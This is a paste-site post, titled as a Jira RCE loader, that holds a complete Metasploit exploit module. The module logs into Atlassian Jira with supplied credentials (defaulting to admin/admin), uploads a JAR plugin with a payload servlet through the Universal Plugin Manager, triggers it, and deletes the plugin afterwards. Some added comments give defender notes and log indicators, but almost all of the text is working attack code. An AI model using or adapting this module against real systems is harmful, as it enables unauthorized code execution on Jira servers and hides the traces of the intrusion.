
[ATLASSIAN JIRA RCE LOADER] #15/11/18

xB4ckdoorREAL Nov 15th, 2018 (edited) 262 Never
  2.  
  3. ##
  4. # This module requires Metasploit: https://metasploit.com/download
  5. # Current source: https://github.com/rapid7/metasploit-framework
  6. ##
  7.  
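  # Metasploit exploit module: code execution on Atlassian Jira by uploading a
  # plugin through the Universal Plugin Manager (UPM) with valid credentials.
  #
  # Flow, as implemented below: fetch login.jsp for a JSESSIONID and the
  # atlassian-token meta value, POST the credentials, read the `upm-token`
  # response header from rest/plugins/1.0/, upload a JAR holding
  # atlassian-plugin.xml plus the payload servlet, request the servlet once,
  # then DELETE the plugin.
  #
  # Defender notes:
  # - Nothing here bypasses authentication; the account must be allowed to use
  #   the plugin manager. Exposure comes down to credential strength and to who
  #   holds that right.
  # - The option defaults (port 2990, /jira/, admin/admin) look like those of an
  #   Atlassian SDK development instance (see References) -- confirm; such an
  #   instance should not be reachable from untrusted networks.
  # - Requests this module sends, useful for log review: a multipart POST to
  #   rest/plugins/1.0/?token=... with Content-Type application/x-java-archive,
  #   a GET to plugins/servlet/metasploit/PayloadServlet, and a DELETE to
  #   rest/plugins/1.0/<random 8-12 letters>-key shortly afterwards.
  class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE

    # Registers module metadata and the user-settable options.
    #
    # @param info [Hash] metadata passed in by the framework, merged via update_info
    def initialize(info = {})
      super(update_info(info,
        'Name'        => 'Atlassian Jira Authenticated Upload Code Execution',
        'Description' => %q{
        This module can be used to execute a payload on Atlassian Jira via
        the Universal Plugin Manager(UPM). The module requires valid login
        credentials to an account that has access to the plugin manager.
        The payload is uploaded as a JAR archive containing a servlet using
        a POST request against the UPM component. The check command will
        test the validity of user supplied credentials and test for access
        to the plugin manager.
      },
        'Author'      => 'Alexander Gonzalez(dubfr33)',
        'License'     => MSF_LICENSE,
        'References'  =>
          [
            ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/'],
            ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/'],
            ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/']
          ],
        'Platform'    => %w[java],
        'Targets'     =>
          [
            ['Java Universal',
              {
                'Arch'     => ARCH_JAVA,
                'Platform' => 'java'
              }
            ]
          ],
        'DisclosureDate' => 'Feb 22 2018'))

      # NOTE(review): admin/admin is a default-credential pair; an instance that
      # accepts it is misconfigured independently of this module.
      register_options(
        [
          Opt::RPORT(2990),
          OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),
          OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),
          OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])
        ])
    end

    # Tests whether the supplied credentials reach the plugin manager page.
    # No plugin is uploaded by this method.
    #
    # @return [CheckCode] Appears when plugins/servlet/upm answers 200 for the
    #   authenticated session, Unknown in every other case
    def check
      login_res = query_login
      if login_res.nil?
        vprint_error('Unable to access the web application!')
        return CheckCode::Unknown
      end
      return CheckCode::Unknown unless login_res.code == 200

      @session_id = get_sid(login_res)
      @xsrf_token = xsrf_token_from(login_res)
      if @xsrf_token.nil?
        # Previously a missing meta tag raised NoMethodError on nil['content'].
        vprint_error('Login page did not contain an atlassian-token meta tag')
        return CheckCode::Unknown
      end

      auth_res = do_auth
      good_sid = get_sid(auth_res)
      good_cookie = "atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}"
      res = query_upm(good_cookie)
      if res.nil?
        vprint_error('Unable to access the web application!')
        CheckCode::Unknown
      elsif res.code == 200
        CheckCode::Appears
      else
        vprint_status('Something went wrong, make sure host is up and options are correct!')
        vprint_status("HTTP Response Code: #{res.code}")
        CheckCode::Unknown
      end
    end

    # Entry point called by the framework: logs in, obtains the UPM token and
    # hands over to upload_exec. Stops through fail_with when the login page or
    # the token cannot be obtained.
    def exploit
      unless access_login?
        fail_with(Failure::Unknown, 'Unable to access the web application!')
      end
      print_status('Retrieving Session ID and XSRF token...')
      auth_res = do_auth
      good_sid = get_sid(auth_res)
      good_cookie = "atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}"
      res = query_for_upm_token(good_cookie)
      if res.nil?
        fail_with(Failure::Unknown, 'Unable to retrieve UPM token!')
      end
      upm_token = res.headers['upm-token']
      # A response without the header (for example after a rejected login)
      # used to continue into the upload with an empty token.
      if upm_token.to_s.empty?
        fail_with(Failure::Unknown, 'Unable to retrieve UPM token!')
      end
      upload_exec(upm_token, good_cookie)
    end

    # Upload, execute, and remove servlet
    #
    # @param upm_token [String] value of the `upm-token` response header
    # @param good_cookie [String] Cookie header value for the authenticated session
    # @return [void]
    def upload_exec(upm_token, good_cookie)
      name = Rex::Text.rand_text_alpha(8..12)

      # Plugin descriptor. The plugin name/key is random per run, but the
      # servlet key, class and URL pattern are fixed strings.
      atlassian_plugin_xml = %Q{
    <atlassian-plugin name="#{name}" key="#{name}" plugins-version="2">
    <plugin-info>
        <description></description>
        <version>1.0</version>
        <vendor name="" url="" />

        <param name="post.install.url">/plugins/servlet/metasploit/PayloadServlet</param>
        <param name="post.upgrade.url">/plugins/servlet/metasploit/PayloadServlet</param>

    </plugin-info>

    <servlet name="#{name}" key="metasploit.PayloadServlet" class="metasploit.PayloadServlet">
        <description>"#{name}"</description>
        <url-pattern>/metasploit/PayloadServlet</url-pattern>
    </servlet>

    </atlassian-plugin>
    }

      # Generates .jar file for upload
      zip = payload.encoded_jar
      zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)

      servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
      zip.add_file('/metasploit/PayloadServlet.class', servlet)

      contents = zip.pack

      boundary = rand_text_numeric(27)

      # Hand-built single-part multipart body carrying the JAR.
      data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"plugin\"; "
      data << "filename=\"#{name}.jar\"\r\nContent-Type: application/x-java-archive\r\n\r\n"
      data << contents
      data << "\r\n--#{boundary}--"

      print_status("Attempting to upload #{name}")
      res = send_request_cgi({
        'uri'            => normalize_uri(target_uri.path, 'rest/plugins/1.0/'),
        'vars_get'       =>
          {
            'token'      => upm_token.to_s
          },
        'method'         => 'POST',
        'data'           => data,
        'headers'        =>
          {
            'Content-Type' => 'multipart/form-data; boundary=' + boundary,
            'Cookie'       => good_cookie.to_s
          }
      }, 25)

      unless res && res.code == 202
        print_status("Error uploading #{name}")
        # res is nil on timeout/connection failure; the original dereferenced
        # it here and raised NoMethodError instead of reporting the error.
        if res
          print_status("HTTP Response Code: #{res.code}")
          print_status("Server Response: #{res.body}")
        end
        return
      end

      print_status("Successfully uploaded #{name}")
      print_status("Executing #{name}")
      # Fixed pause between upload and first request; presumably lets the
      # plugin finish enabling -- the 202 above only acknowledges the upload.
      Rex::ThreadSafe.sleep(3)
      send_request_cgi({
        'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),
        'method'       => 'GET',
        'cookie'       => good_cookie.to_s
      })

      # The DELETE result is not inspected, so a failed removal leaves the
      # plugin installed without any message.
      print_status("Deleting #{name}")
      send_request_cgi({
        'uri'          => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"),
        'method'       => 'DELETE',
        'cookie'       => good_cookie.to_s
      })
    end

    # Loads the login page and stores @session_id and @xsrf_token from it.
    #
    # @return [Boolean] true when the page answered 200 and carried the
    #   atlassian-token meta tag, false otherwise
    def access_login?
      res = query_login
      if res.nil?
        fail_with(Failure::Unknown, 'Unable to access the web application!')
      end
      return false unless res.code == 200

      @session_id = get_sid(res)
      @xsrf_token = xsrf_token_from(res)
      # A page without the meta tag is treated as "no access" rather than
      # raising NoMethodError on nil['content'].
      !@xsrf_token.nil?
    end

    # Sends GET request to login page so the HTTP response can be used
    #
    # @return [Object, nil] the HTTP response, or nil when none was received
    def query_login
      send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'))
    end

    # Queries plugin manager to verify access
    #
    # @param good_cookie [String] Cookie header value for the authenticated session
    def query_upm(good_cookie)
      send_request_cgi({
        'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/upm'),
        'method'       => 'GET',
        'cookie'       => good_cookie.to_s
      })
    end

    # Queries API for response containing upm_token
    #
    # @param good_cookie [String] Cookie header value for the authenticated session
    def query_for_upm_token(good_cookie)
      send_request_cgi({
        'uri'          => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'),
        'method'       => 'GET',
        'cookie'       => good_cookie.to_s
      })
    end

    # Authenticates to webapp with user supplied credentials
    #
    # Uses @xsrf_token and @session_id, so check or access_login? must have
    # run first. The response is returned as-is; this method does not decide
    # whether the login succeeded.
    def do_auth
      send_request_cgi({
        'uri'              => normalize_uri(target_uri.path.to_s, 'login.jsp'),
        'method'           => 'POST',
        'cookie'           => "atlassian.xsrf.token=#{@xsrf_token}; #{@session_id}",
        'vars_post'        => {
          'os_username'    => datastore['HttpUsername'],
          'os_password'    => datastore['HttpPassword'],
          'os_destination' => '',
          'user_role'      => '',
          'atl_token'      => '',
          'login'          => 'Log+In'
        }
      })
    end

    # Finds SID from HTTP response headers
    #
    # @param res [Object, nil] HTTP response
    # @return [String] "JSESSIONID=<value>", or '' when res is nil or carries
    #   no such cookie
    def get_sid(res)
      return '' if res.nil?

      res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
    end

    # Reads the content attribute of the atlassian-token meta tag.
    #
    # @param res [Object] HTTP response for the login page
    # @return [String, nil] the token, or nil when the tag is absent
    def xsrf_token_from(res)
      node = res.get_html_document.at('meta[@id="atlassian-token"]')
      node && node['content']
    end
  end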
  236.  
  237. # 2018-11-15 #